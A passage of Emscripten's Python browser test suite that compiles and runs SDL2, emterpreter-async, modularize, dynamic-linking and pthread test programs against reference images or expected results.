self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
def test_sdl2_canvas_palette_2(self):
open(os.path.join(self.get_dir(), 'args-r.js'), 'w').write('''
Module['arguments'] = ['-r'];
''')
open(os.path.join(self.get_dir(), 'args-g.js'), 'w').write('''
Module['arguments'] = ['-g'];
''')
open(os.path.join(self.get_dir(), 'args-b.js'), 'w').write('''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2'])
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), os.path.join(self.get_dir(), 'screenshot.not'))
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
open('test.html', 'w').write(html)
open('data.txt', 'w').write('datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl2_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
run_process([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
# Error.stackTraceLimit default to 10 in chrome but this test relies on more
# than 40 stack frames being reported.
with open('pre.js', 'w') as f:
f.write('Error.stackTraceLimit = 80;\n')
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3', '--pre-js', 'pre.js', ])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'EXIT_RUNTIME=1'])
@requires_sound_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
@requires_sync_compilation
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
run_process([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts)
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
run_process([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
run_process([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
@requires_sync_compilation
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
print(str(opt))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
